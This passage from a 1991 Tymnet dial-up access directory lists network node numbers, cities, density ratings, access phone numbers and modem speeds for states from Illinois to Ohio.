02256   ELGIN                ILLINOIS       LOW  708/888-8113
07731   FOREST PARK/MAYWOOD  ILLINOIS       LOW  708/345-9100
07721 # FREEPORT             ILLINOIS       LOW  815/232-7111  300-2400/MNP
02465   GLEN ELLYN           ILLINOIS       MED  708/790-4400
02244 # GLEN ELLYN           ILLINOIS       MED  708/790-4955  2400/MNP
10471   JOLIET               ILLINOIS       LOW  815/727-2169


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 9

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
10247 # KANKAKEE/BRADLEY     ILLINOIS       LOW  815/935-2352  300-2400/MNP
05551 # LAKE BLUFF           ILLINOIS       LOW  708/295-7075  300-2400/MNP
05552 # LAKE BLUFF           ILLINOIS       LOW  708/295-7075  300-2400/MNP
11242 # LAKE ZURICH/PALATINE ILLINOIS       LOW  708/991-7171  300-2400/MNP
10432   LANSING              ILLINOIS       LOW  708/474-1422
05552 # LIBRTYVLE/LAKE BLUFF ILLINOIS       LOW  708/295-7075  300-2400/MNP
05551 # LIBRTYVLE/LAKE BLUFF ILLINOIS       LOW  708/295-7075  300-2400/MNP
07731   MAYWOOD              ILLINOIS       LOW  708/345-9100
11743 # NORTHFIELD           ILLINOIS       LOW  708/501-4536  300-2400/MNP
11207 # O'FALLON             ILLINOIS       LOW  618/632-3993  300-2400/MNP
11242 # PALATINE             ILLINOIS       LOW  708/991-7171  300-2400/MNP
05307 # PEORIA               ILLINOIS       LOW  309/637-5961  300-2400/MNP
07306 # ROCK ISLAND          ILLINOIS       MED  309/788-3713  300-2400/MNP
05605   ROCKFORD             ILLINOIS       MED  815/654-1900
11307 # ROCKFORD             ILLINOIS       MED  815/633-2080  2400/MNP
04311   SPRINGFIELD          ILLINOIS       MED  217/525-8025
04475 # SPRINGFIELD          ILLINOIS       MED  217/544-0312  2400/MNP
03031   ST. CHARLES/AURORA   ILLINOIS       LOW  708/844-0700
02367 # URBANA               ILLINOIS       LOW  217/344-3400  300-2400/MNP
02465   WHEATON/GLEN ELLYN   ILLINOIS       MED  708/790-4400
02244 # WHEATON/GLN ELLYN    ILLINOIS       MED  708/790-4955  2400/MNP

02155 # BLOOMINGTON          INDIANA        LOW  812/332-0544  300-2400/MNP
04161 # ELKHART              INDIANA        LOW  219/293-8860  300-2400/MNP
03656 # EVANSVILLE           INDIANA        LOW  812/464-8181  300-2400/MNP
03653 # FT. WAYNE            INDIANA        LOW  219/422-2581  300-2400/MNP
06546 # GARY                 INDIANA        LOW  219/885-0002  300-2400/MNP
06546 # HAMMOND/GARY         INDIANA        LOW  219/885-0002  300-2400/MNP
06546 # HIGHLAND/GARY        INDIANA        LOW  219/885-0002  300-2400/MNP
02066   INDIANAPOLIS         INDIANA        HIGH 317/631-1002
02074 # INDIANAPOLIS         INDIANA        HIGH 317/632-6408  2400/MNP
05672 + INDIANAPOLIS         INDIANA        HIGH 317/687-0305  9600/MNP
07650 # KOKOMO               INDIANA        LOW  317/453-7818  300-2400/MNP
07455 # LAFAYETTE            INDIANA        LOW  317/423-4616  2400/MNP
07733 # MARION               INDIANA        LOW  317/662-1928  300-2400/MNP
03106   MISHAWAKA/SOUTH BEND INDIANA        MED  219/234-5005
11274 # MISHAWAKA/SOUTH BEND INDIANA        MED  219/234-6410  2400/MNP
07706 # MUNCIE               INDIANA        LOW  317/284-7821  300-2400/MNP
03106   SOUTH BEND           INDIANA        MED  219/234-5005
11274 # SOUTH BEND           INDIANA        MED  219/234-6410  2400/MNP
07454 # TERRE HAUTE          INDIANA        LOW  812/232-0112  300-2400/MNP

05671 # AMES                 IOWA           LOW  515/232-0157  300-2400/MNP
04114 # CEDAR FALLS/WATERLOO IOWA           LOW  319/236-9020  300-2400/MNP
06407 # CEDAR RAPIDS         IOWA           LOW  319/363-7514  300-2400/MNP
07306 # DAVENPORT/ROCKISLAND IOWA           MED  309/788-3713  300-2400/MNP
03532   DES MOINES           IOWA           MED  515/277-7752
03461 # DES MOINES           IOWA           MED  515/277-9684  2400/MNP
07456 # DUBUQUE              IOWA           LOW  319/582-3599  300-2400/MNP
10320 # IOWA CITY            IOWA           LOW  319/354-3633  300-2400/MNP
02026 # MARSHALLTOWN         IOWA           LOW  515/753-0670  300-2400/MNP
05021 # SIOUX CITY           IOWA           LOW  712/255-3834  300-2400/MNP
04114 # WATERLOO             IOWA           LOW  319/236-9020  300-2400/MNP

04650   KANSAS CITY/MISSION  KANSAS         HIGH 913/384-1226
03230 # KANSAS CITY/MISSION  KANSAS         HIGH 913/384-5012  2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE10

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
03572 # KANSAS CITY/MISSION  KANSAS         HIGH 913/384-5012  2400/MNP
04363 # LAWRENCE             KANSAS         LOW  913/843-4870  300-2400/MNP
07726 # LEAVENWORTH          KANSAS         LOW  913/651-8094  300-2400/MNP
05716 # MANHATTAN            KANSAS         LOW  913/776-9803  300-2400/MNP
04650   MISSION              KANSAS         HIGH 913/384-1226
04653 + MISSION              KANSAS         HIGH 913/384-0071  9600/MNP
03572 # MISSION              KANSAS         HIGH 913/384-5012  2400/MNP
03230 # MISSION              KANSAS         HIGH 913/384-5012  2400/MNP
07730 # SALINA               KANSAS         LOW  913/825-4845  300-2400/MNP
04650   SHAWNEE/MISSION      KANSAS         HIGH 913/384-1226
04653 + SHAWNEE/MISSION      KANSAS         HIGH 913/384-0071  9600/MNP
03572 # SHAWNEE/MISSION      KANSAS         HIGH 913/384-5012  2400/MNP
03230 # SHAWNEE/MISSION      KANSAS         HIGH 913/384-5012  2400/MNP
06774 # TOPEKA               KANSAS         LOW  913/234-3070  300-2400/MNP
05441   WICHITA              KANSAS         MED  316/681-0832
05443 # WICHITA              KANSAS         MED  316/681-2719  2400/MNP

07471 # BOWLING GREEN        KENTUCKY       LOW  502/781-5711  300-2400/MNP
03154 # FRANKFORT            KENTUCKY       LOW  502/223-0724  300-2400/MNP
06626   LEXINGTON            KENTUCKY       MED  606/266-0019
05774 # LEXINGTON            KENTUCKY       MED  606/266-7063  2400/MNP
10337   LOUISVILLE           KENTUCKY       MED  502/499-7110
05520 # LOUISVILLE           KENTUCKY       MED  502/499-9825  2400/MNP
11323 # OWENSBORO            KENTUCKY       LOW  502/685-0959  300-2400/MNP

05275 # ALEXANDRIA           LOUISIANA      LOW  318/445-2694  300-2400/MNP
02723   BATON ROUGE          LOUISIANA      MED  504/924-5102
02745 # BATON ROUGE          LOUISIANA      MED  504/291-0967  2400/MNP
10510 # LAFAYETTE            LOUISIANA      LOW  318/234-8255  300-2400/MNP
05276 # LAKE CHARLES         LOUISIANA      LOW  318/494-1991  300-2400/MNP
07646 # MONROE               LOUISIANA      LOW  318/388-8810  300-2400/MNP
06532   NEW ORLEANS          LOUISIANA      HIGH 504/522-1370
06525 # NEW ORLEANS          LOUISIANA      HIGH 504/525-2014  2400/MNP
03731 # SHREVEPORT           LOUISIANA      LOW  318/688-5840  2400/MNP
11026 # SLIDELL              LOUISIANA      LOW  504/646-2900  300-2400/MNP

11067 # AUBURN               MAINE          LOW  207/795-6013  300-2400/MNP
10601 # AUGUSTA              MAINE          LOW  207/622-3083  300-2400/MNP
11003 # BANGOR               MAINE          LOW  207/990-0529  300-2400/MNP
11067 # LEWISTON/AUBURN      MAINE          LOW  207/795-6013  300-2400/MNP
04220 # PORTLAND             MAINE          LOW  207/775-5971  300-2400/MNP

07315 # ABERDEEN             MARYLAND       LOW  301/273-7100  300-2400/MNP
11663 # ANNAPOLIS            MARYLAND       LOW  301-224-0520  300-2400/MNP
02354   BALTIMORE            MARYLAND       HIGH 301/547-8100
05553 # BALTIMORE            MARYLAND       HIGH 301/528-9296  2400/MNP
05554 # BALTIMORE            MARYLAND       HIGH 301/528-9296  2400/MNP
10034   BALTIMORE            MARYLAND       HIGH 301/659-7460  9600/MNP
02544   BETHESDA             MARYLAND       HIGH 703/691-8200
02545   BETHESDA             MARYLAND       HIGH 703/691-8200
02035 # BETHESDA             MARYLAND       HIGH 703/352-3136  2400/MNP
04075 # BETHESDA             MARYLAND       HIGH 703/352-3136  2400/MNP
06256   BETHESDA             MARYLAND       HIGH 703/385-7587  9600/MNP
11063 # CUMBERLAND           MARYLAND       LOW  301/777-9320  300-2400/MNP
06242 # FREDERICK/MYERSVILLE MARYLAND       LOW  301/293-9504  300-2400/MNP
06242 # HAGERSTOWN/MYERSVLLE MARYLAND       LOW  301/293-9504  300-2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE11

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
06242 # MYERSVILLE           MARYLAND       LOW  301/293-9504  300-2400/MNP
10560 # ROCKVILLE            MARYLAND       LOW  301/869-2700  300-2400/MNP
07571 # SALISBURY            MARYLAND       LOW  301/860-0480  300-2400/MNP

07735   ATTLEBORO            MASSACHUSETTS  LOW  508/226-6441
10031 # BEDFORD              MASSACHUSETTS  LOW  617/271-0420  300-2400/MNP
07525   BOSTON               MASSACHUSETTS  HIGH 617/439-3400
07001   BOSTON               MASSACHUSETTS  HIGH 617/439-3400
04713   BOSTON               MASSACHUSETTS  HIGH 617/330-5107  9600/MNP
10515 # BOSTON               MASSACHUSETTS  HIGH 617/439-3531  2400/MNP
10520 # BOSTON               MASSACHUSETTS  HIGH 617/439-3531  2400/MNP
10521 # BOSTON               MASSACHUSETTS  HIGH 617/439-3531  2400/MNP
04713   CAMBRIDGE/BOSTON     MASSACHUSETTS  HIGH 617/330-5107  9600/MNP
10521 # CAMBRIDGE/BOSTON     MASSACHUSETTS  HIGH 617/439-3531  2400/MNP
10515 # CAMBRIDGE/BOSTON     MASSACHUSETTS  HIGH 617/439-3531  2400/MNP
11453 # GROTON               MASSACHUSETTS  LOW  508/448-9361  300-2400/MNP
04027 # KINGSTON             MASSACHUSETTS  LOW  617/585-7616  300-2400/MNP
06421 # LAWRENCE             MASSACHUSETTS  LOW  508/683-2680  300-2400/MNP
02502 # LAWRENCE             MASSACHUSETTS  LOW  508/683-2680  300-2400/MNP
07677 # LEOMINSTER           MASSACHUSETTS  LOW  508/537-6451  300-2400/MNP
07625 # LOWELL               MASSACHUSETTS  LOW  508/452-5112  300-2400/MNP
07610   LYNN                 MASSACHUSETTS  LOW  617/593-4051
02616 # MANCHESTER           MASSACHUSETTS  LOW  508/526-1506  300-2400/MNP
11405 # MARLBOROUGH          MASSACHUSETTS  LOW  508/481-0026  300-2400/MNP
03302   NEW BEDFORD          MASSACHUSETTS  LOW  508/999-4521
07332   PITTSFIELD           MASSACHUSETTS  LOW  413/499-0971
05464   RANDOLPH             MASSACHUSETTS  LOW  617/986-0500
11422   RANDOLPH             MASSACHUSETTS  LOW  617/986-0500
07210   SOMERSET             MASSACHUSETTS  LOW  508/676-3087
07743   SPRINGFIELD          MASSACHUSETTS  MED  413/787-0048
11306 # SPRINGFIELD          MASSACHUSETTS  MED  413/785-1762  2400/MNP
07374 # TAUNTON              MASSACHUSETTS  LOW  508/824-6692  300-2400/MNP
10031 # WOBURN/BEDFORD       MASSACHUSETTS  LOW  617/271-0420  300-2400/MNP
03675 # WORCESTER            MASSACHUSETTS  LOW  508/791-9000  300-2400/MNP
10520 # cAMBRIDGE/BOSTON     MASSACHUSETTS  HIGH 617/439-3531  2400/MNP

10103   ANN ARBOR            MICHIGAN       MED  313/973-0166  9600 BPS
10307 # ANN ARBOR            MICHIGAN       MED  313/973-7935  300-2400/MNP
11451 # BATTLE CREEK         MICHIGAN       LOW  616/964-9303  300-2400/MNP
04225 # BENTON HARBOR        MICHIGAN       LOW  616/925-3134  300-2400/MNP
03344 # BURTON               MICHIGAN       LOW  313/743-8350  300-2400/MNP
07465 # CADILLAC             MICHIGAN       LOW  616/775-9242  300-2400/MNP
04501   DETROIT              MICHIGAN       HIGH 313/962-2870
04455 # DETROIT              MICHIGAN       HIGH 313/963-3460  2400/MNP
03530 # DETROIT              MICHIGAN       HIGH 313/963-3460  2400/MNP
07005   DETROIT              MICHIGAN       HIGH 313/964-1225  9600/MNP
03344 # FLINT/BURTON         MICHIGAN       LOW  313/743-8350  300-2400/MNP
04467 # FREELAND             MICHIGAN       LOW  517/695-6751  300-2400/MNP
11144 + GRAND RAPIDS         MICHIGAN       MED  616/458-9252  9600


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE12

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
04117 # GRAND RAPIDS         MICHIGAN       MED  616/459-2304  300-2400/MNP
02666 # JACKSON              MICHIGAN       LOW  517/788-9191  300-2400/MNP
03516 # KALAMAZOO            MICHIGAN       MED  616/388-2130  300-2400/MNP
03666   LANSING              MICHIGAN       MED  517/482-5721
11236 # LANSING              MICHIGAN       MED  517/484-5344  2400/MNP
06762 # MARQUETTE            MICHIGAN       LOW  906/228-3780  300-2400/MNP
04467 # MIDLAND/FREELAND     MICHIGAN       LOW  517/695-6751  300-2400/MNP
07466 # MUSKEGON             MICHIGAN       LOW  616/739-3453  300-2400/MNP
04542 # PLYMOUTH             MICHIGAN       MED  313/451-2400  300-2400/MNP
05366   PONTIAC              MICHIGAN       LOW  313/338-8384
07467 # PORT HURON           MICHIGAN       LOW  313/982-0301  300-2400/MNP
06014   ROSEVILLE            MICHIGAN       LOW  313/774-1000
04467 # SAGINAW/FREELAND     MICHIGAN       LOW  517/695-6751  300-2400/MNP
03654 # SOUTHFIELD           MICHIGAN       MED  313/424-8024  300-2400/MNP
11010 + SOUTHFIELD           MICHIGAN       MED  313/557-2106  9600 BPS
04225 # ST. JOE/BENTON HRBR  MICHIGAN       LOW  616/925-3134  300-2400/MNP
05063 # TRAVERSE CITY        MICHIGAN       LOW  616/947-0050  300-2400/MNP

11741 # DULUTH               MINNESOTA      LOW  218/722-0655  300-2400/MNP
03614 # MANKATO              MINNESOTA      LOW  507/387-7313  300-2400/MNP
04316   MINNEAPOLIS          MINNESOTA      HIGH 612/333-2799
04425 # MINNEAPOLIS          MINNESOTA      HIGH 612/332-4024  2400/MNP
04321 # MINNEAPOLIS          MINNESOTA      HIGH 612/332-4024  2400/MNP
02377   MINNEAPOLIS          MINNESOTA      HIGH 612/338-0845  9600/MNP
11671 # ROCHESTER            MINNESOTA      LOW  507/282-0830  300-2400/MNP
04321 # ST PAUL/MINNEAPOLIS  MINNESOTA      HIGH 612/332-4024  2400/MNP
04425 # ST PAUL/MINNEAPOLIS  MINNESOTA      HIGH 612/332-4024  2400/MNP
02323 # ST. CLOUD            MINNESOTA      LOW  612/251-4942  300-2400/MNP
04316   ST. PAUL/MINNEAPOLIS MINNESOTA      HIGH 612/333-2799
02377   ST. PAUL/MINNEAPOLIS MINNESOTA      HIGH 612/338-0845  9600/MNP

05147 # GULFPORT             MISSISSIPPI    LOW  601/868-2331  300-2400/MNP
02402 # HATTIESBURG          MISSISSIPPI    LOW  601/582-0286  300-2400/MNP
04621 # JACKSON              MISSISSIPPI    LOW  601/355-9741  300-2400/MNP
07714 # MERIDIAN             MISSISSIPPI    LOW  601/482-4335  300-2400/MNP
04354 # PASCAGOULA           MISSISSIPPI    LOW  601/769-0121  300-2400/MNP
02674 # TUPELO               MISSISSIPPI    LOW  601/841-0090  300-2400/MNP
05302 # VICKSBURG            MISSISSIPPI    LOW  601/638-1551  300-2400/MNP

04764   BRIDGETON/HAZELWOOD  MISSOURI       HIGH 314/731-8002
05717   BRIDGETON/HAZELWOOD  MISSOURI       HIGH 314/731-0703  9600/MNP
05715 # BRIDGETON/HAZELWOOD  MISSOURI       HIGH 314/731-8283  2400/MNP
04765 # BRIDGETON/HAZELWOOD  MISSOURI       HIGH 314/731-8283  2400/MNP
10602 # CAPE GIRARDEAU       MISSOURI       LOW  314/335-1518  300-2400/MNP
05044 # COLUMBIA             MISSOURI       LOW  314/874-2771  300-2400/MNP
04764   HAZELWOOD            MISSOURI       HIGH 314/731-8002
05717   HAZELWOOD            MISSOURI       HIGH 314/731-0703  9600/MNP
05715 # HAZELWOOD            MISSOURI       HIGH 314/731-8283  2400/MNP
04765 # HAZELWOOD            MISSOURI       HIGH 314/731-8283  2400/MNP
03572 # INDEPENDENCE         MISSOURI       HIGH 913/384-5012  2400/MNP
03230 # INDEPENDENCE/MISSION MISSOURI       HIGH 913/384-5012  2400/MNP
05502 # JEFFERSON CITY       MISSOURI       LOW  314/634-8296  300-2400/MNP
03677 # JOPLIN               MISSOURI       LOW  417/781-8718  300-2400/MNP
04650   KANSAS CITY/MISSION  MISSOURI       HIGH 913/384-1226
03572 # KANSAS CITY/MISSION  MISSOURI       HIGH 913/384-5012  2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE13

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
03230 # KANSAS CITY/MISSION  MISSOURI       HIGH 913/384-5012  2400/MNP
07126 # ROLLA                MISSOURI       LOW  314/364-2084  300-2400/MNP
10673 # SPRINGFIELD          MISSOURI       LOW  417/881-6225  300-2400/MNP
05715 # ST LOUIS/HAZELWOOD   MISSOURI       HIGH 314/731-8283  2400/MNP
04765 # ST LOUIS/HAZELWOOD   MISSOURI       HIGH 314/731-8283  2400/MNP
03144   ST. JOSEPH           MISSOURI       LOW  816/232-1455
04764   ST. LOUIS/HAZELWOOD  MISSOURI       HIGH 314/731-8002
05717   ST. LOUIS/HAZELWOOD  MISSOURI       HIGH 314/731-0703  9600/MNP

03726 # BILLINGS             MONTANA        LOW  406/252-4880  300-2400/MNP
10570   BOZEMAN              MONTANA        LOW  406/585-9719
07447 # BUTTE                MONTANA        LOW  406/494-6682  300-2400/MNP
07154 # GREAT FALLS          MONTANA        LOW  406/727-9510  300-2400/MNP
05017 # HELENA               MONTANA        LOW  406/443-0112  300-2400/MNP
04111 # MISSOULA             MONTANA        LOW  406/721-8960  300-2400/MNP

10730 # GRAND ISLAND         NEBRASKA       LOW  308/382-3176  300-2400/MNP
11012 # LINCOLN              NEBRASKA       LOW  402/464-6235  300-2400/MNP
06106   OMAHA                NEBRASKA       MED  402/393-0903
07121 # OMAHA                NEBRASKA       MED  402/393-1305  2400/MNP

03107   BOULDER CITY         NEVADA         MED  702/293-0300
11360 # BOULDER CITY         NEVADA         MED  702/294-0602  2400/MNP
03673 # CARSON CITY          NEVADA         MED  702/885-8411  300-2400/MNP
11360 # LAS VEGAS/BLDR CITY  NEVADA         MED  702/294-0602  2400/MNP
03107   LAS VEGAS/BOLDER CTY NEVADA         MED  702/293-0300
03673 # RENO/CARSON CITY     NEVADA         MED  702/885-8411  300-2400/MNP

04375   CONCORD              NEW HAMPSHIRE  LOW  603/228-4732
05256 # DURHAM               NEW HAMPSHIRE  LOW  603/868-1502  300-2400/MNP
07375 # HANOVER              NEW HAMPSHIRE  LOW  603/643-4011  300-2400/MNP
04122 # MANCHESTER           NEW HAMPSHIRE  LOW  603/623-0409  300-2400/MNP
07042 # NASHUA               NEW HAMPSHIRE  MED  603/882-0435  300-2400/MNP
03224 # NORTH HAMPTON        NEW HAMPSHIRE  LOW  603/964-7779  300-2400 BPS
02640 # PETERBOROUGH         NEW HAMPSHIRE  LOW  603/924-7090  300-2400/MNP
07042 # SALEM/NASHUA         NEW HAMPSHIRE  MED  603/882-0435  300-2400/MNP

04351 # ATLANTIC CITY        NEW JERSEY     LOW  609/345-4050  300-2400/MNP
03401   CAMDEN/PENNSAUKEN    NEW JERSEY     LOW  609/665-5600
10105 # CAMDEN/PENNSAUKEN    NEW JERSEY     MED  609/665-5902  2400/MNP
03401   CHERRY HILL/PENNSKN  NEW JERSEY     LOW  609/665-5600
10105 # CHERRY HILL/PENNSKN  NEW JERSEY     MED  609/665-5902  2400/MNP
05211 # EATONTOWN/RED BANK   NEW JERSEY     LOW  201/758-0337  300-2400/MNP
02606   ELIZABETH/NEWARK     NEW JERSEY     HIGH 201/824-1212
05627 # ELIZABETH/NEWARK     NEW JERSEY     HIGH 201/824-3044  2400/MNP
02744 # ELIZABETH/NEWARK     NEW JERSEY     HIGH 201/824-3044  2400/MNP
06035   ENGLEWOOD CLIFFS     NEW JERSEY     MED  201/567-9841
06037 # ENGLEWOOD CLIFFS     NEW JERSEY     MED  201/567-8951  2400/MNP
06035   FAIR LAWN/ENGLWD CLF NEW JERSEY     MED  201/567-9841
02606   JERSEY CITY/NEWARK   NEW JERSEY     HIGH 201/824-1212
05627 # JERSEY CITY/NEWARK   NEW JERSEY     HIGH 201/824-3044  2400/MNP
02744 # JERSEY CITY/NEWARK   NEW JERSEY     HIGH 201/824-3044  2400/MNP
05211 # LONG BRANCH/RED BANK NEW JERSEY     LOW  201/758-0337  300-2400/MNP
11305 # LYNDHURST/UNION CITY NEW JERSEY     HIGH 201/864-0995  2400/MNP
04025   MORRISTOWN           NEW JERSEY     LOW  201/539-1222


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE14

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
02606   NEWARK               NEW JERSEY     HIGH 201/824-1212
02744 # NEWARK               NEW JERSEY     HIGH 201/824-3044  2400/MNP
05627 # NEWARK               NEW JERSEY     HIGH 201/824-3044  2400/MNP
07413 + NEWARK               NEW JERSEY     LOW  201/824-4201  9600 BPS
05456 # PATERSON             NEW JERSEY     MED  201/742-0752  2400 BPS
03401   PENNSAUKEN           NEW JERSEY     LOW  609/665-5600
10105 # PENNSAUKEN           NEW JERSEY     MED  609/665-5902  2400/MNP
06472   PISCATAWAY           NEW JERSEY     HIGH 201/562-9700
06544 # PISCATAWAY           NEW JERSEY     HIGH 201/562-8550  2400/MNP
10621   PRINCETON/SO. BRNSWK NEW JERSEY     HIGH 609/452-1018
04126   RAHWAY               NEW JERSEY     LOW  201/396-8550
05211 # RED BANK             NEW JERSEY     LOW  201/758-0337  300-2400/MNP
05456 # RIDGEWOOD/PATERSON   NEW JERSEY     MED  201/742-0752  2400 BPS
10621   SOUTH BRUNSWICK      NEW JERSEY     HIGH 609/452-1018
10153 + SOUTH BRUNSWICK      NEW JERSEY     HIGH 609/452-8388  9600/MNP
10622 # SOUTH BRUNSWICK      NEW JERSEY     HIGH 609/452-9529  2400/MNP
10622 # SOUTH BRUNSWICK      NEW JERSEY     HIGH 609/452-9529  2400/MNP
03652 # TRENTON              NEW JERSEY     LOW  609/394-1900  300-2400/MNP
04166 # TRENTON              NEW JERSEY     LOW  609/394-1900  300-2400/MNP
07432   UNION CITY           NEW JERSEY     HIGH 201/864-8468
11305 # UNION CITY           NEW JERSEY     HIGH 201/864-0995  2400/MNP
02606   UNION/NEWARK         NEW JERSEY     HIGH 201/824-1212
02744 # UNION/NEWARK         NEW JERSEY     HIGH 201/824-3044  2400/MNP
05627 # UNION/NEWARK         NEW JERSEY     HIGH 210/824-3044  2400/MNP
02252 # VINELAND             NEW JERSEY     LOW  609/691-6446  300-2400/MNP
05456 # WAYNE/PATERSON       NEW JERSEY     MED  201/742-0752  2400 BPS

04212   ALBUQUERQUE          NEW MEXICO     MED  505/242-8344
02265 # ALBUQUERQUE          NEW MEXICO     MED  505/242-8931  2400/MNP
02071 # LAS CRUCES           NEW MEXICO     LOW  505/525-3401  300-2400/MNP
07636 # SANTA FE             NEW MEXICO     LOW  505/471-0606  300-2400/MNP

03705   ALBANY               NEW YORK       MED  518/458-8300
02045 # ALBANY               NEW YORK       MED  518/458-9724  2400/MNP
03533 # BINGHAMPTON          NEW YORK       LOW  607/724-4351  300-2400/MNP
10061   BUFFALO              NEW YORK       MED  716/893-1306
11123 # BUFFALO              NEW YORK       MED  716/893-1014  2400/MNP
05650 # CENTEREACH/LK GROVE  NEW YORK       MED  516/471-6080  300-2400/MNP
07364 # CORNING              NEW YORK       LOW  607/962-4481  300-2400/MNP
06660 # ELMIRA               NEW YORK       LOW  607/737-9065  2400/MNP
03703   HEMPSTEAD            NEW YORK       MED  516/485-7422
04325 # HEMPSTEAD            NEW YORK       MED  516/481-0150  2400/MNP
03540 + HEMPSTEAD            NEW YORK       LOW  516/565-0111  9600 BPS
04045   HUNTINGTON/MELVILLE  NEW YORK       MED  516/420-1221
04232 # HUNTINGTON/MELVILLE  NEW YORK       MED  516/420-4579  2400/MNP
04406   ITHACA               NEW YORK       LOW  607/257-6601
10171   JAMESTOWN            NEW YORK       LOW  716/488-0794
10605 # KINGSTON             NEW YORK       LOW  914/336-2790  300-2400/MNP
05650 # LAKE GROVE           NEW YORK       MQ  516/471-6080  300-2400/MNP
04045   MELVILLE             NEW YORK       MED  516/420-1221
04232 # MELVILLE             NEW YORK       MED  516/420-4579  2400/MNP
03703   MINEOLA/HEMPSTEAD    NEW YORK       MED  516/485-7422
06347 # NEW CITY             NEW YORK       LOW  914/634-0388  300-2400/MNP
04515   NEW YORK             NEW YORK       HIGH 212/943-4700
04516   NEW YORK             NEW YORK       HIGH 212/943-4700
10710   NEW YORK             NEW YORK       HIGH 212/943-4700


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE15

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
02304   NEW YORK             NEW YORK       HIGH 212/269-4640  9600/MNP
07061 # NEW YORK             NEW YORK       HIGH 212/809-9660  2400/MNP
07054 # NEW YORK             NEW YORK       HIGH 212/809-9660  2400/MNP
07062 # NEW YORK             NEW YORK       HIGH 212/809-9660  2400/MNP
05373 # NEW YORK             NEW YORK       HIGH 212/809-9660  2400/MNP
03704   NIAGARA FALLS        NEW YORK       LOW  716/285-2561
06462   PERINTON/PITTSFORD   NEW YORK       HIGH 716/385-5817
06464 # PERINTON/PITTSFORD   NEW YORK       HIGH 716/385-5710  2400/MNP
06462   PITTSFORD            NEW YORK       HIGH 716/385-5817
06464 # PITTSFORD            NEW YORK       HIGH 716/385-5710  2400/MNP
03377 # POUGHKEEPSIE         NEW YORK       LOW  914/473-0401  300-2400/MNP
06462   ROCHESTER/PITTSFORD  NEW YORK       HIGH 716/385-5817
06464 # ROCHESTER/PITTSFORD  NEW YORK       HIGH 716/385-5710  2400/MNP
05650 # RONKONKOMA/LAKE GRVE NEW YORK       MED  516/471-6080  300-2400/MNP
03705   SCHENECTADY/ALBANY   NEW YORK       MED  518/458-8300
02045 # SCHENECTADY/ALBANY   NEW YORK       MED  518/458-9724  2400/MNP
04672   SYRACUSE             NEW YORK       MED  315/437-7111
11276 # SYRACUSE             NEW YORK       MED  315/433-1593  2400/MNP
06342 # UTICA                NEW YORK       LOW  315/797-7001  300-2400/MNP
05206   WHITE PLAINS         NEW YORK       HIGH 914/328-7730
07236 # WHITE PLAINS         NEW YORK       HIGH 914/761-9590  2400/MNP
06521 # WHITE PLAINS         NEW YORK       HIGH 914/761-9590  2400/MNP
10472   WINDSOR              NEW YORK       LOW  914/561-9103

11356 # ASHEVILLE            NORTH CAROLINA LOW  704/253-8945  300-2400/MNP
06645 # CHAPEL HILL/DURHAM   NORTH CAROLINA MED  919/549-9025  2400/MNP
10567 # CHAPEL HILL/DURHAM   NORTH CAROLINA MED  919/549-9025  2400/MNP
06105   CHARLOTTE            NORTH CAROLINA HIGH 704/377-0521
07026 # CHARLOTTE            NORTH CAROLINA HIGH 704/374-0803  2400/MNP
02613   DURHAM               NORTH CAROLINA MED  919/549-8952
06645 # DURHAM               NORTH CAROLINA MED  919/549-9025  2400/MNP
10567 # DURHAM               NORTH CAROLINA MED  919/549-9025  2400/MNP
06341 # FAYETTEVILLE         NORTH CAROLINA LOW  919/486-0103  300-2400/MNP
07607 # GASTONIA             NORTH CAROLINA LOW  704/867-2203  300-2400/MNP
03437 # GREENSBORO           NORTH CAROLINA MED  919/273-0332  300-2400/MNP
07241 # GREENVILLE           NORTH CAROLINA LOW  919/758-0102  300-2400/MNP
07242 # HIGH POINT           NORTH CAROLINA LOW  919/883-6121  300-2400/MNP
10027 # KANNAPOLIS           NORTH CAROLINA LOW  704/932-4131  300-2400/MNP
03624   RALEIGH              NORTH CAROLINA LOW  919/829-0536
05264 # ROCKY MOUNT          NORTH CAROLINA LOW  919/937-4828  300-2400/MNP
07316 # WILMINGTON           NORTH CAROLINA LOW  919/762-1865  300-2400/MNP
03720 # WINSTON-SALEM        NORTH CAROLINA MED  919/765-1221  300-2400/MNP
11161 # WINSTON-SALEM        NORTH CAROLINA MED  919/765-1221  300-2400/MNP

07124 # BISMARK              NORTH DAKOTA   LOW  701/255-0869  300-2400/MNP
04751 # FARGO                NORTH DAKOTA   LOW  701/280-0210  300-2400/MNP
07340   GRAND FORKS          NORTH DAKOTA   LOW  701/746-0344
07457 # MINOT                NORTH DAKOTA   LOW  701/839-4210  300-2400/MNP

10543   AKRON                OHIO           MED  216/376-6227
10546 # AKRON                OHIO           MED  216/376-8330  2400/MNP
03114 # CANTON               OHIO           LOW  216/456-0840  300-2400/MNP
07075   CINCINNATI           OHIO           HIGH 513/530-9019
07140 + CINCINNATI           OHIO           HIGH 513/489-1032  9600/MNP
06151 # CINCINNATI           OHIO           HIGH 513/530-9021  2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE16

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
05100 # CINCINNATI           OHIO           HIGH 513/530-9021  2400/MNP
04530   CLEVELAND            OHIO           HIGH 216/241-0024
04063 + CLEVELAND            OHIO           LOW  216/696-0545  9600
04671 # CLEVELAND            OHIO           HIGH 216/861-6709  2400/MNP
10233 # CLEVELAND            OHIO           HIGH 216/861-6709  2400/MNP
